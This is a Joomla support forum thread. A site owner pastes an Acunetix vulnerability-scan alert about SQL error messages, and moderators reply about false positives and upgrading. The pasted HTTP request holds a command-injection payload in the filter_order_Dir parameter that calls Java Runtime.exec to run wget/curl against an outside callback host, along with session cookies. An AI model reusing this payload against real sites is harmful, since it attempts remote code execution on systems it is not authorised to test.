Dear Sirs,
When I updated my website, and scanned by Acunetix, I got 740 medium severity as below reports! How can we fix this problem
Thanks
// ===== Acunetix reports ==== //
Alert group Application error message
Severity Medium
Description
This alert requires manual confirmation
Application error or warning messages may expose sensitive information about an application's
internal workings to an attacker.
Acunetix found an error or warning message that may disclose sensitive information. The
message may also contain the location of the file that produced an unhandled exception. Consult
the 'Attack details' section for more information about the affected page.
Recommendations
Verify that this page is disclosing error or warning messages and properly configure the
application to log errors to a file instead of displaying the error to the user.
Alert variants
Details
URL encoded POST input filter_order_Dir was set to 1
Pattern found:
You have an error in your SQL syntax
POST /index.php/cn/servicecategory/%E5%A1%91%E6%96%99%E6%80%A7%E8%83%BD%E6%B5%8B%E8%AF%95.feed
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.labtestone.org/
Connection: keep-alive
Cookie:
d6623af456feb47dbdcf2396224b7b70=qpc3shevudnoiv8g1afd1a2l07;612204977e0fbae5e9cf27e947f61573
=svckf7vq4l02a4qr99avqii953; 612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953;
lca8320_0=0; 612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=6fv7j8nst1sib9n6f22jjdnpl5; lca8320_0=0
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 192
Host: www.labtestone.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
filter_order=1&filter_order_Dir[#this.getClass().forName('java.lang.Runtime').getRuntime().e
xec('wget+http://hitipzQwMaGB5.bxss.me/||curl+htt ... 5.bxss.me/')]=1&limitstart=
1&task=1
3.8.10 acunetix Medium Severity on filter_order_Dir set to 1
Moderators: mandville, General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
-
fc338339
- Joomla! Apprentice
- Posts: 18
- Joined: Tue Jul 19, 2016 10:27 pm
-
toivo
- Joomla! Master
- Posts: 17426
- Joined: Thu Feb 15, 2007 5:48 am
- Location: Sydney, Australia
Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1
Your site produces the following message:
403: Access Forbidden
Your location (GB) has been blacklisted.
Toivo Talikka, Global Moderator
-
CyrusXxX
- Joomla! Enthusiast
- Posts: 236
- Joined: Wed Oct 04, 2017 6:23 am
- Location: Belgrade Serbia
- Contact:
Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1
As instructed visit those pages and check if they give you msgs or errors. False positives can happen.Description
This alert requires manual confirmation
Application error or warning messages may expose sensitive information about an application's
internal workings to an attacker.
Acunetix found an error or warning message that may disclose sensitive information. The
message may also contain the location of the file that produced an unhandled exception. Consult
the 'Attack details' section for more information about the affected page.
Recommendations
Verify that this page is disclosing error or warning messages and properly configure the
application to log errors to a file instead of displaying the error to the user.
-
fc338339
- Joomla! Apprentice
- Posts: 18
- Joined: Tue Jul 19, 2016 10:27 pm
Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1
Dear Sirs,
How to avoid this "false positives" .
Thanks
How to avoid this "false positives" .
Thanks
-
mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1
Options
1. Update joomla and rescan
2. Don't use a 3rd party scanner.
3. Ask acunetix what their results mean or read the instructions first.
E.g. would you ring persil when your washing machine started beeping or would you read the manual first.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
CyrusXxX
- Joomla! Enthusiast
- Posts: 236
- Joined: Wed Oct 04, 2017 6:23 am
- Location: Belgrade Serbia
- Contact:
Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1
When websites are in questions all automated scans will produce false positive and currently there is no way of avoiding them.
When you receive warnings like that you need to confirm them and separate false from real threats.
I need to point out that many devs in their extensions use coding which sometimes triggers automated scanners.
If you are skilled enough you will be able to figure out what are false positive or what is real security issue.
When you receive warnings like that you need to confirm them and separate false from real threats.
I need to point out that many devs in their extensions use coding which sometimes triggers automated scanners.
If you are skilled enough you will be able to figure out what are false positive or what is real security issue.
